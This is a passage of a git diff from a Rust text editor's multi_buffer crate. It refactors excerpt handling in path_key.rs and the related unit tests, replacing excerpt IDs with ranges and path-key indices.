excerpt_3_info) = + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer_1.clone(), + [Point::new(0, 0)..Point::new(1, 3)], + 0, + cx, + ); - multibuffer.set_excerpts_for_path( - PathKey::sorted(1), - buffer_2.clone(), - [Point::new(0, 0)..Point::new(1, 3)], - 0, - cx, - ); + multibuffer.set_excerpts_for_path( + PathKey::sorted(1), + buffer_2.clone(), + [Point::new(0, 0)..Point::new(1, 3)], + 0, + cx, + ); - multibuffer.set_excerpts_for_path( - PathKey::sorted(2), - buffer_3.clone(), - [Point::new(0, 0)..Point::new(0, 3)], - 0, - cx, - ); + multibuffer.set_excerpts_for_path( + PathKey::sorted(2), + buffer_3.clone(), + [Point::new(0, 0)..Point::new(0, 3)], + 0, + cx, + ); - let mut ids = multibuffer.excerpt_ids().into_iter(); - ( - ids.next().unwrap(), - ids.next().unwrap(), - ids.next().unwrap(), - ) - }); + let snapshot = multibuffer.snapshot(cx); + let mut excerpts = snapshot.excerpts(); + ( + excerpts.next().unwrap(), + excerpts.next().unwrap(), + excerpts.next().unwrap(), + ) + }); let snapshot = multibuffer.read(cx).snapshot(cx); @@ -5018,24 +5710,24 @@ fn test_excerpts_containment_functions(cx: &mut App) { let excerpts: Vec<_> = snapshot.excerpts_for_range(p00..p00).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_1_id); + assert_eq!(excerpts[0].range, excerpt_1_info); // Cursor at very end of excerpt 3 let excerpts: Vec<_> = snapshot.excerpts_for_range(p43..p43).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_3_id); + assert_eq!(excerpts[0].range, excerpt_3_info); let excerpts: Vec<_> = snapshot.excerpts_for_range(p00..p23).collect(); assert_eq!(excerpts.len(), 2); - assert_eq!(excerpts[0].id, excerpt_1_id); - assert_eq!(excerpts[1].id, excerpt_2_id); + assert_eq!(excerpts[0].range, excerpt_1_info); + assert_eq!(excerpts[1].range, excerpt_2_info); // This range represent an selection with end-point just inside excerpt_2 // Today we only 
expand the first excerpt, but another interpretation that // we could consider is expanding both here let excerpts: Vec<_> = snapshot.excerpts_for_range(p10..p20).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_1_id); + assert_eq!(excerpts[0].range, excerpt_1_info); //// Test that `excerpts_for_range` and `excerpt_containing` agree for all single offsets (cursor positions) for offset in 0..=snapshot.len().0 { @@ -5047,15 +5739,15 @@ fn test_excerpts_containment_functions(cx: &mut App) { "Expected exactly one excerpt for offset {offset}", ); - let excerpt_containing = snapshot.excerpt_containing(offset..offset); - assert!( - excerpt_containing.is_some(), - "Expected excerpt_containing to find excerpt for offset {offset}", - ); + let (_, excerpt_containing) = + snapshot + .excerpt_containing(offset..offset) + .unwrap_or_else(|| { + panic!("Expected excerpt_containing to find excerpt for offset {offset}") + }); assert_eq!( - excerpts_for_range[0].id, - excerpt_containing.unwrap().id(), + excerpts_for_range[0].range, excerpt_containing, "excerpts_for_range and excerpt_containing should agree for offset {offset}", ); } @@ -5063,9 +5755,8 @@ fn test_excerpts_containment_functions(cx: &mut App) { //// Test `excerpt_containing` behavior with ranges: // Ranges intersecting a single-excerpt - let containing = snapshot.excerpt_containing(p00..p13); - assert!(containing.is_some()); - assert_eq!(containing.unwrap().id(), excerpt_1_id); + let (_, containing) = snapshot.excerpt_containing(p00..p13).unwrap(); + assert_eq!(containing, excerpt_1_info); // Ranges intersecting multiple excerpts (should return None) let containing = snapshot.excerpt_containing(p20..p40); @@ -5076,14 +5767,12 @@ fn test_excerpts_containment_functions(cx: &mut App) { } #[gpui::test] -fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { - use std::ops::Bound; - +fn test_range_to_buffer_ranges(cx: &mut App) { let buffer_1 = cx.new(|cx| Buffer::local("aaa\nbbb", 
cx)); let buffer_2 = cx.new(|cx| Buffer::local("ccc", cx)); let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - let (excerpt_1_id, excerpt_2_id) = multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::sorted(0), buffer_1.clone(), @@ -5099,10 +5788,6 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { 0, cx, ); - - let excerpt_ids = multibuffer.excerpt_ids(); - - (excerpt_ids[0], excerpt_ids[1]) }); let snapshot = multibuffer.read(cx).snapshot(cx); @@ -5116,41 +5801,15 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { 1, "Half-open range ending at excerpt start should EXCLUDE that excerpt" ); - assert_eq!(ranges_half_open[0].2, excerpt_1_id); - - let ranges_inclusive = snapshot.range_to_buffer_ranges(Point::zero()..=excerpt_2_start); - assert_eq!( - ranges_inclusive.len(), - 2, - "Inclusive range ending at excerpt start should INCLUDE that excerpt" - ); - assert_eq!(ranges_inclusive[0].2, excerpt_1_id); - assert_eq!(ranges_inclusive[1].2, excerpt_2_id); - - let ranges_unbounded = - snapshot.range_to_buffer_ranges((Bound::Included(Point::zero()), Bound::Unbounded)); - assert_eq!( - ranges_unbounded.len(), - 2, - "Unbounded end should include all excerpts" - ); - assert_eq!(ranges_unbounded[0].2, excerpt_1_id); - assert_eq!(ranges_unbounded[1].2, excerpt_2_id); - - let ranges_excluded_end = snapshot.range_to_buffer_ranges(( - Bound::Included(Point::zero()), - Bound::Excluded(excerpt_2_start), - )); + assert_eq!(ranges_half_open[0].1, BufferOffset(0)..BufferOffset(7)); assert_eq!( - ranges_excluded_end.len(), - 1, - "Excluded end bound should exclude excerpt starting at that point" + ranges_half_open[0].0.remote_id(), + buffer_1.read(cx).remote_id() ); - assert_eq!(ranges_excluded_end[0].2, excerpt_1_id); let buffer_empty = cx.new(|cx| Buffer::local("", cx)); let multibuffer_trailing_empty = cx.new(|_| 
MultiBuffer::new(Capability::ReadWrite)); - let (te_excerpt_1_id, te_excerpt_2_id) = + let (_te_excerpt_1_info, _te_excerpt_2_info) = multibuffer_trailing_empty.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::sorted(0), @@ -5168,8 +5827,9 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { cx, ); - let excerpt_ids = multibuffer.excerpt_ids(); - (excerpt_ids[0], excerpt_ids[1]) + let snapshot = multibuffer.snapshot(cx); + let mut infos = snapshot.excerpts(); + (infos.next().unwrap(), infos.next().unwrap()) }); let snapshot_trailing = multibuffer_trailing_empty.read(cx).snapshot(cx); @@ -5180,29 +5840,130 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { let ranges_half_open_max = snapshot_trailing.range_to_buffer_ranges(Point::zero()..max_point); assert_eq!( ranges_half_open_max.len(), - 1, - "Half-open range to max_point should EXCLUDE trailing empty excerpt at max_point" + 2, + "Should include trailing empty excerpts" + ); + assert_eq!(ranges_half_open_max[1].1, BufferOffset(0)..BufferOffset(0)); +} + +#[gpui::test] +async fn test_buffer_range_to_excerpt_ranges(cx: &mut TestAppContext) { + let base_text = indoc!( + " + aaa + bbb + ccc + ddd + eee + ppp + qqq + rrr + fff + ggg + hhh + " + ); + let text = indoc!( + " + aaa + BBB + ddd + eee + ppp + qqq + rrr + FFF + ggg + hhh + " + ); + + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let diff = cx + .new(|cx| BufferDiff::new_with_base_text(base_text, &buffer.read(cx).text_snapshot(), cx)); + cx.run_until_parked(); + + let multibuffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer.clone(), + [ + Point::new(0, 0)..Point::new(3, 3), + Point::new(7, 0)..Point::new(9, 3), + ], + 0, + cx, + ); + multibuffer.add_diff(diff.clone(), cx); + multibuffer + }); + + multibuffer.update(cx, |multibuffer, cx| { + 
multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); + }); + cx.run_until_parked(); + + let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + + let actual_diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + let expected_diff = indoc!( + " + aaa + - bbb + - ccc + + BBB + ddd + eee [\u{2193}] + - fff [\u{2191}] + + FFF + ggg + hhh [\u{2193}]" + ); + pretty_assertions::assert_eq!(actual_diff, expected_diff); + + let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); + + let query_spanning_deleted_hunk = buffer_snapshot.anchor_after(Point::new(0, 0)) + ..buffer_snapshot.anchor_before(Point::new(1, 3)); + assert_eq!( + snapshot + .buffer_range_to_excerpt_ranges(query_spanning_deleted_hunk) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![ + Point::new(0, 0)..Point::new(1, 0), + Point::new(3, 0)..Point::new(3, 3), + ], ); - assert_eq!(ranges_half_open_max[0].2, te_excerpt_1_id); - let ranges_inclusive_max = snapshot_trailing.range_to_buffer_ranges(Point::zero()..=max_point); + let query_within_contiguous_main_buffer = buffer_snapshot.anchor_after(Point::new(1, 0)) + ..buffer_snapshot.anchor_before(Point::new(2, 3)); assert_eq!( - ranges_inclusive_max.len(), - 2, - "Inclusive range to max_point should INCLUDE trailing empty excerpt" + snapshot + .buffer_range_to_excerpt_ranges(query_within_contiguous_main_buffer) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![Point::new(3, 0)..Point::new(4, 3)], ); - assert_eq!(ranges_inclusive_max[0].2, te_excerpt_1_id); - assert_eq!(ranges_inclusive_max[1].2, te_excerpt_2_id); - let ranges_unbounded_trailing = snapshot_trailing - .range_to_buffer_ranges((Bound::Included(Point::zero()), Bound::Unbounded)); + let query_spanning_both_excerpts = buffer_snapshot.anchor_after(Point::new(2, 0)) + ..buffer_snapshot.anchor_before(Point::new(8, 3)); assert_eq!( - 
ranges_unbounded_trailing.len(), - 2, - "Unbounded end should include trailing empty excerpt" + snapshot + .buffer_range_to_excerpt_ranges(query_spanning_both_excerpts) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![ + Point::new(4, 0)..Point::new(5, 3), + Point::new(7, 0)..Point::new(8, 3), + ], ); - assert_eq!(ranges_unbounded_trailing[0].2, te_excerpt_1_id); - assert_eq!(ranges_unbounded_trailing[1].2, te_excerpt_2_id); } #[gpui::test] @@ -5248,17 +6009,14 @@ fn test_cannot_seek_backward_after_excerpt_replacement(cx: &mut TestAppContext) let (anchor_in_e_b2, anchor_in_e_b3) = multibuffer.read_with(cx, |multibuffer, cx| { let snapshot = multibuffer.snapshot(cx); - let excerpt_ids: Vec = snapshot.excerpts().map(|(id, _, _)| id).collect(); - assert_eq!(excerpt_ids.len(), 4, "expected 4 excerpts (3×B + 1×C)"); + let excerpt_infos = snapshot.excerpts().collect::>(); + assert_eq!(excerpt_infos.len(), 4, "expected 4 excerpts (3×B + 1×C)"); - let e_b2_id = excerpt_ids[1]; - let e_b3_id = excerpt_ids[2]; + let e_b2_info = excerpt_infos[1].clone(); + let e_b3_info = excerpt_infos[2].clone(); - let e_b2 = snapshot.excerpt(e_b2_id).expect("E_B2 should exist"); - let e_b3 = snapshot.excerpt(e_b3_id).expect("E_B3 should exist"); - - let anchor_b2 = Anchor::in_buffer(e_b2_id, e_b2.range.context.start); - let anchor_b3 = Anchor::in_buffer(e_b3_id, e_b3.range.context.start); + let anchor_b2 = snapshot.anchor_in_excerpt(e_b2_info.context.start).unwrap(); + let anchor_b3 = snapshot.anchor_in_excerpt(e_b3_info.context.start).unwrap(); (anchor_b2, anchor_b3) }); @@ -5287,3 +6045,104 @@ fn test_cannot_seek_backward_after_excerpt_replacement(cx: &mut TestAppContext) snapshot.summaries_for_anchors::(&[anchor_in_e_b2, anchor_in_e_b3]); }); } + +#[gpui::test] +fn test_resolving_max_anchor_for_buffer(cx: &mut TestAppContext) { + let dock_base_text = indoc! {" + 0 + 1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + 11 + 12 + "}; + + let dock_text = indoc! 
{" + 0 + 4 + 5 + 6 + 10 + 11 + 12 + "}; + + let dock_buffer = cx.new(|cx| Buffer::local(dock_text, cx)); + let diff = cx.new(|cx| { + BufferDiff::new_with_base_text(dock_base_text, &dock_buffer.read(cx).snapshot(), cx) + }); + + let workspace_text = "second buffer\n"; + let workspace_buffer = cx.new(|cx| Buffer::local(workspace_text, cx)); + + let dock_path = PathKey::with_sort_prefix(0, rel_path("").into_arc()); + let workspace_path = PathKey::with_sort_prefix(1, rel_path("").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpt_ranges_for_path( + dock_path, + dock_buffer.clone(), + &dock_buffer.read(cx).snapshot(), + vec![ + ExcerptRange::new(Point::zero()..Point::new(1, 1)), + ExcerptRange::new(Point::new(3, 0)..Point::new(4, 2)), + ], + cx, + ); + multibuffer.set_excerpt_ranges_for_path( + workspace_path, + workspace_buffer.clone(), + &workspace_buffer.read(cx).snapshot(), + vec![ExcerptRange::new( + Point::zero()..workspace_buffer.read(cx).max_point(), + )], + cx, + ); + multibuffer.add_diff(diff, cx); + multibuffer.set_all_diff_hunks_expanded(cx); + }); + + let snapshot = multibuffer.update(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + let diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + assert_eq!( + diff, + indoc! 
{" + 0 + - 1 + - 2 + - 3 + 4 [↓] + 6 [↑] + - 7 + - 8 + - 9 + 10 [↓] + second buffer + "} + ); + + multibuffer.update(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let point = snapshot + .anchor_in_buffer(text::Anchor::max_for_buffer( + dock_buffer.read(cx).remote_id(), + )) + .unwrap() + .to_point(&snapshot); + assert_eq!(point, Point::new(10, 0)); + }) +} diff --git a/crates/multi_buffer/src/path_key.rs b/crates/multi_buffer/src/path_key.rs index 09d17d7b7fe2e9e666ba6c5777216c9c8ba4dea0..5c2123d0f9c1b09c16fd99531973df81c45140f7 100644 --- a/crates/multi_buffer/src/path_key.rs +++ b/crates/multi_buffer/src/path_key.rs @@ -1,24 +1,20 @@ -use std::{mem, ops::Range, sync::Arc}; +use std::{ops::Range, rc::Rc, sync::Arc}; -use collections::HashSet; use gpui::{App, AppContext, Context, Entity}; use itertools::Itertools; use language::{Buffer, BufferSnapshot}; use rope::Point; -use text::{Bias, OffsetRangeExt, locator::Locator}; -use util::{post_inc, rel_path::RelPath}; +use sum_tree::{Dimensions, SumTree}; +use text::{Bias, BufferId, Edit, OffsetRangeExt, Patch}; +use util::rel_path::RelPath; use ztracing::instrument; use crate::{ - Anchor, ExcerptId, ExcerptRange, ExpandExcerptDirection, MultiBuffer, build_excerpt_ranges, + Anchor, BufferState, BufferStateSnapshot, DiffChangeKind, Event, Excerpt, ExcerptOffset, + ExcerptRange, ExcerptSummary, ExpandExcerptDirection, MultiBuffer, MultiBufferOffset, + PathKeyIndex, build_excerpt_ranges, remove_diff_state, }; -#[derive(Debug, Clone)] -pub struct PathExcerptInsertResult { - pub excerpt_ids: Vec, - pub added_new_excerpt: bool, -} - #[derive(PartialEq, Eq, Ord, PartialOrd, Clone, Hash, Debug)] pub struct PathKey { // Used by the derived PartialOrd & Ord @@ -27,6 +23,13 @@ pub struct PathKey { } impl PathKey { + pub fn min() -> Self { + Self { + sort_prefix: None, + path: RelPath::empty().into_arc(), + } + } + pub fn sorted(sort_prefix: u64) -> Self { Self { sort_prefix: Some(sort_prefix), @@ -55,41 
+58,17 @@ impl PathKey { } impl MultiBuffer { - pub fn paths(&self) -> impl Iterator + '_ { - self.excerpts_by_path.keys() - } - - pub fn excerpts_for_path(&self, path: &PathKey) -> impl '_ + Iterator { - self.excerpts_by_path - .get(path) - .map(|excerpts| excerpts.as_slice()) - .unwrap_or_default() - .iter() - .copied() - } - - pub fn path_for_excerpt(&self, excerpt: ExcerptId) -> Option { - self.paths_by_excerpt.get(&excerpt).cloned() - } - - pub fn remove_excerpts_for_path(&mut self, path: PathKey, cx: &mut Context) { - if let Some(to_remove) = self.excerpts_by_path.remove(&path) { - self.remove_excerpts(to_remove, cx) - } - } - pub fn buffer_for_path(&self, path: &PathKey, cx: &App) -> Option> { - let excerpt_id = self.excerpts_by_path.get(path)?.first()?; - let snapshot = self.read(cx); - let excerpt = snapshot.excerpt(*excerpt_id)?; - self.buffer(excerpt.buffer_id) + let snapshot = self.snapshot(cx); + let excerpt = snapshot.excerpts_for_path(path).next()?; + self.buffer(excerpt.context.start.buffer_id) } pub fn location_for_path(&self, path: &PathKey, cx: &App) -> Option { - let excerpt_id = self.excerpts_by_path.get(path)?.first()?; - let snapshot = self.read(cx); - let excerpt = snapshot.excerpt(*excerpt_id)?; - Some(Anchor::in_buffer(excerpt.id, excerpt.range.context.start)) + let snapshot = self.snapshot(cx); + let excerpt = snapshot.excerpts_for_path(path).next()?; + let path_key_index = snapshot.path_key_index_for_buffer(excerpt.context.start.buffer_id)?; + Some(Anchor::in_buffer(path_key_index, excerpt.context.start)) } pub fn set_excerpts_for_buffer( @@ -98,12 +77,14 @@ impl MultiBuffer { ranges: impl IntoIterator>, context_line_count: u32, cx: &mut Context, - ) -> (Vec>, bool) { + ) -> bool { let path = PathKey::for_buffer(&buffer, cx); self.set_excerpts_for_path(path, buffer, ranges, context_line_count, cx) } /// Sets excerpts, returns `true` if at least one new excerpt was added. 
+ /// + /// Any existing excerpts for this buffer or this path will be replaced by the provided ranges. #[instrument(skip_all)] pub fn set_excerpts_for_path( &mut self, @@ -112,20 +93,83 @@ impl MultiBuffer { ranges: impl IntoIterator>, context_line_count: u32, cx: &mut Context, - ) -> (Vec>, bool) { + ) -> bool { let buffer_snapshot = buffer.read(cx).snapshot(); + let ranges: Vec<_> = ranges.into_iter().collect(); let excerpt_ranges = build_excerpt_ranges(ranges, context_line_count, &buffer_snapshot); - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - self.set_merged_excerpt_ranges_for_path( - path, - buffer, - excerpt_ranges, + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, &buffer_snapshot, merged, cx); + inserted + } + + /// Like [`Self::set_excerpts_for_path`], but expands the provided ranges to cover any overlapping existing excerpts + /// for the same buffer and path. + /// + /// Existing excerpts that do not overlap any of the provided ranges are discarded. 
+ pub fn update_excerpts_for_path( + &mut self, + path: PathKey, + buffer: Entity, + ranges: impl IntoIterator>, + context_line_count: u32, + cx: &mut Context, + ) -> bool { + let buffer_snapshot = buffer.read(cx).snapshot(); + let ranges: Vec<_> = ranges.into_iter().collect(); + let excerpt_ranges = build_excerpt_ranges(ranges, context_line_count, &buffer_snapshot); + let merged = self.merge_new_with_existing_excerpt_ranges( + &path, &buffer_snapshot, - new, - counts, + excerpt_ranges, cx, - ) + ); + + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, &buffer_snapshot, merged, cx); + inserted + } + + pub fn merge_new_with_existing_excerpt_ranges( + &self, + path: &PathKey, + buffer_snapshot: &BufferSnapshot, + mut excerpt_ranges: Vec>, + cx: &App, + ) -> Vec> { + let multibuffer_snapshot = self.snapshot(cx); + + if multibuffer_snapshot.path_for_buffer(buffer_snapshot.remote_id()) == Some(path) { + excerpt_ranges.sort_by_key(|range| range.context.start); + let mut combined_ranges = Vec::new(); + let mut new_ranges = excerpt_ranges.into_iter().peekable(); + for existing_range in + multibuffer_snapshot.excerpts_for_buffer(buffer_snapshot.remote_id()) + { + let existing_range = ExcerptRange { + context: existing_range.context.to_point(buffer_snapshot), + primary: existing_range.primary.to_point(buffer_snapshot), + }; + while let Some(new_range) = new_ranges.peek() + && new_range.context.end < existing_range.context.start + { + combined_ranges.push(new_range.clone()); + new_ranges.next(); + } + + if let Some(new_range) = new_ranges.peek() + && new_range.context.start <= existing_range.context.end + { + combined_ranges.push(existing_range) + } + } + combined_ranges.extend(new_ranges); + excerpt_ranges = combined_ranges; + } + + excerpt_ranges.sort_by_key(|range| range.context.start); + Self::merge_excerpt_ranges(&excerpt_ranges) } pub fn set_excerpt_ranges_for_path( @@ -135,17 +179,11 @@ impl MultiBuffer { buffer_snapshot: 
&BufferSnapshot, excerpt_ranges: Vec>, cx: &mut Context, - ) -> (Vec>, bool) { - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - self.set_merged_excerpt_ranges_for_path( - path, - buffer, - excerpt_ranges, - buffer_snapshot, - new, - counts, - cx, - ) + ) -> bool { + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, buffer_snapshot, merged, cx); + inserted } pub fn set_anchored_excerpts_for_path( @@ -161,350 +199,505 @@ impl MultiBuffer { let mut app = cx.to_async(); async move { let snapshot = buffer_snapshot.clone(); - let (excerpt_ranges, new, counts) = app + let (ranges, merged_excerpt_ranges) = app .background_spawn(async move { - let ranges = ranges.into_iter().map(|range| range.to_point(&snapshot)); + let point_ranges = ranges.iter().map(|range| range.to_point(&snapshot)); let excerpt_ranges = - build_excerpt_ranges(ranges, context_line_count, &snapshot); - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - (excerpt_ranges, new, counts) + build_excerpt_ranges(point_ranges, context_line_count, &snapshot); + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + (ranges, merged) }) .await; multi_buffer .update(&mut app, move |multi_buffer, cx| { - let (ranges, _) = multi_buffer.set_merged_excerpt_ranges_for_path( + let (_, path_key_index) = multi_buffer.set_merged_excerpt_ranges_for_path( path_key, buffer, - excerpt_ranges, &buffer_snapshot, - new, - counts, + merged_excerpt_ranges, cx, ); ranges + .into_iter() + .map(|range| Anchor::range_in_buffer(path_key_index, range)) + .collect() }) .ok() .unwrap_or_default() } } - pub(super) fn expand_excerpts_with_paths( + pub fn expand_excerpts( &mut self, - ids: impl IntoIterator, + anchors: impl IntoIterator, line_count: u32, direction: ExpandExcerptDirection, cx: &mut Context, ) { - let mut sorted_ids: Vec = ids.into_iter().collect(); - sorted_ids.sort_by(|a, b| { - let path_a 
= self.paths_by_excerpt.get(a); - let path_b = self.paths_by_excerpt.get(b); - path_a.cmp(&path_b) - }); - let grouped = sorted_ids - .into_iter() - .chunk_by(|id| self.paths_by_excerpt.get(id).cloned()) + if line_count == 0 { + return; + } + + let snapshot = self.snapshot(cx); + let mut sorted_anchors = anchors .into_iter() - .filter_map(|(k, v)| Some((k?, v.into_iter().collect::>()))) + .filter_map(|anchor| anchor.excerpt_anchor()) .collect::>(); - let snapshot = self.snapshot(cx); - - for (path, ids) in grouped.into_iter() { - let Some(excerpt_ids) = self.excerpts_by_path.get(&path) else { + if sorted_anchors.is_empty() { + return; + } + sorted_anchors.sort_by(|a, b| a.cmp(b, &snapshot)); + let buffers = sorted_anchors.into_iter().chunk_by(|anchor| anchor.path); + let mut cursor = snapshot.excerpts.cursor::(()); + + for (path_index, excerpt_anchors) in &buffers { + let path = snapshot + .path_keys_by_index + .get(&path_index) + .expect("anchor from wrong multibuffer"); + + let mut excerpt_anchors = excerpt_anchors.peekable(); + let mut ranges = Vec::new(); + + cursor.seek_forward(path, Bias::Left); + let Some((buffer, buffer_snapshot)) = cursor + .item() + .map(|excerpt| (excerpt.buffer(&self), excerpt.buffer_snapshot(&snapshot))) + else { continue; }; - let ids_to_expand = HashSet::from_iter(ids); - let mut excerpt_id_ = None; - let expanded_ranges = excerpt_ids.iter().filter_map(|excerpt_id| { - let excerpt = snapshot.excerpt(*excerpt_id)?; - let excerpt_id = excerpt.id; - if excerpt_id_.is_none() { - excerpt_id_ = Some(excerpt_id); + while let Some(excerpt) = cursor.item() + && &excerpt.path_key == path + { + let mut range = ExcerptRange { + context: excerpt.range.context.to_point(buffer_snapshot), + primary: excerpt.range.primary.to_point(buffer_snapshot), + }; + + let mut needs_expand = false; + while excerpt_anchors.peek().is_some_and(|anchor| { + excerpt + .range + .contains(&anchor.text_anchor(), buffer_snapshot) + }) { + needs_expand = true; + 
excerpt_anchors.next(); } - let mut context = excerpt.range.context.to_point(&excerpt.buffer); - if ids_to_expand.contains(&excerpt_id) { + if needs_expand { match direction { ExpandExcerptDirection::Up => { - context.start.row = context.start.row.saturating_sub(line_count); - context.start.column = 0; + range.context.start.row = + range.context.start.row.saturating_sub(line_count); + range.context.start.column = 0; } ExpandExcerptDirection::Down => { - context.end.row = - (context.end.row + line_count).min(excerpt.buffer.max_point().row); - context.end.column = excerpt.buffer.line_len(context.end.row); + range.context.end.row = (range.context.end.row + line_count) + .min(excerpt.buffer_snapshot(&snapshot).max_point().row); + range.context.end.column = excerpt + .buffer_snapshot(&snapshot) + .line_len(range.context.end.row); } ExpandExcerptDirection::UpAndDown => { - context.start.row = context.start.row.saturating_sub(line_count); - context.start.column = 0; - context.end.row = - (context.end.row + line_count).min(excerpt.buffer.max_point().row); - context.end.column = excerpt.buffer.line_len(context.end.row); + range.context.start.row = + range.context.start.row.saturating_sub(line_count); + range.context.start.column = 0; + range.context.end.row = (range.context.end.row + line_count) + .min(excerpt.buffer_snapshot(&snapshot).max_point().row); + range.context.end.column = excerpt + .buffer_snapshot(&snapshot) + .line_len(range.context.end.row); } } } - Some(ExcerptRange { - context, - primary: excerpt.range.primary.to_point(&excerpt.buffer), - }) - }); - let mut merged_ranges: Vec> = Vec::new(); - for range in expanded_ranges { - if let Some(last_range) = merged_ranges.last_mut() - && last_range.context.end >= range.context.start - { - last_range.context.end = range.context.end; - continue; - } - merged_ranges.push(range) + ranges.push(range); + cursor.next(); } - let Some(excerpt_id) = excerpt_id_ else { - continue; - }; - let Some(buffer_id) = 
&snapshot.buffer_id_for_excerpt(excerpt_id) else { - continue; - }; - let Some(buffer) = self.buffers.get(buffer_id).map(|b| b.buffer.clone()) else { - continue; - }; + ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); - let buffer_snapshot = buffer.read(cx).snapshot(); - self.update_path_excerpts(path.clone(), buffer, &buffer_snapshot, merged_ranges, cx); + self.set_excerpt_ranges_for_path(path.clone(), buffer, buffer_snapshot, ranges, cx); } } /// Sets excerpts, returns `true` if at least one new excerpt was added. - fn set_merged_excerpt_ranges_for_path( + pub(crate) fn set_merged_excerpt_ranges_for_path( &mut self, path: PathKey, buffer: Entity, - ranges: Vec>, buffer_snapshot: &BufferSnapshot, - new: Vec>, - counts: Vec, + new: Vec>, cx: &mut Context, - ) -> (Vec>, bool) { - let insert_result = self.update_path_excerpts(path, buffer, buffer_snapshot, new, cx); - - let mut result = Vec::new(); - let mut ranges = ranges.into_iter(); - for (excerpt_id, range_count) in insert_result - .excerpt_ids + ) -> (bool, PathKeyIndex) + where + T: language::ToOffset, + { + let anchor_ranges = new .into_iter() - .zip(counts.into_iter()) - { - for range in ranges.by_ref().take(range_count) { - let range = Anchor::range_in_buffer( - excerpt_id, - buffer_snapshot.anchor_before(&range.primary.start) - ..buffer_snapshot.anchor_after(&range.primary.end), - ); - result.push(range) - } + .map(|r| ExcerptRange { + context: buffer_snapshot.anchor_before(r.context.start) + ..buffer_snapshot.anchor_after(r.context.end), + primary: buffer_snapshot.anchor_before(r.primary.start) + ..buffer_snapshot.anchor_after(r.primary.end), + }) + .collect::>(); + let inserted = + self.update_path_excerpts(path.clone(), buffer, buffer_snapshot, &anchor_ranges, cx); + let path_key_index = self.get_or_create_path_key_index(&path); + (inserted, path_key_index) + } + + pub(crate) fn get_or_create_path_key_index(&mut self, path_key: &PathKey) -> PathKeyIndex { + let mut snapshot = 
self.snapshot.borrow_mut(); + + if let Some(&existing) = snapshot.indices_by_path_key.get(path_key) { + return existing; } - (result, insert_result.added_new_excerpt) + + let index = snapshot + .path_keys_by_index + .last() + .map(|(index, _)| PathKeyIndex(index.0 + 1)) + .unwrap_or(PathKeyIndex(0)); + snapshot.path_keys_by_index.insert(index, path_key.clone()); + snapshot.indices_by_path_key.insert(path_key.clone(), index); + index } pub fn update_path_excerpts( &mut self, - path: PathKey, + path_key: PathKey, buffer: Entity, buffer_snapshot: &BufferSnapshot, - new: Vec>, + to_insert: &Vec>, cx: &mut Context, - ) -> PathExcerptInsertResult { - let mut insert_after = self - .excerpts_by_path - .range(..path.clone()) - .next_back() - .and_then(|(_, value)| value.last().copied()) - .unwrap_or(ExcerptId::min()); - - let existing = self - .excerpts_by_path - .get(&path) - .cloned() - .unwrap_or_default(); - let mut new_iter = new.into_iter().peekable(); - let mut existing_iter = existing.into_iter().peekable(); - - let mut excerpt_ids = Vec::new(); - let mut to_remove = Vec::new(); - let mut to_insert: Vec<(ExcerptId, ExcerptRange)> = Vec::new(); - let mut added_a_new_excerpt = false; - let snapshot = self.snapshot(cx); + ) -> bool { + let path_key_index = self.get_or_create_path_key_index(&path_key); + if let Some(old_path_key) = self + .snapshot(cx) + .path_for_buffer(buffer_snapshot.remote_id()) + && old_path_key != &path_key + { + self.remove_excerpts(old_path_key.clone(), cx); + } - let mut next_excerpt_id = - if let Some(last_entry) = self.snapshot.get_mut().excerpt_ids.last() { - last_entry.id.0 + 1 - } else { - 1 - }; + if to_insert.len() == 0 { + self.remove_excerpts(path_key.clone(), cx); - let mut next_excerpt_id = move || ExcerptId(post_inc(&mut next_excerpt_id)); + return false; + } + assert_eq!(self.history.transaction_depth(), 0); + self.sync_mut(cx); - let mut excerpts_cursor = snapshot.excerpts.cursor::>(()); - excerpts_cursor.next(); + let buffer_id = 
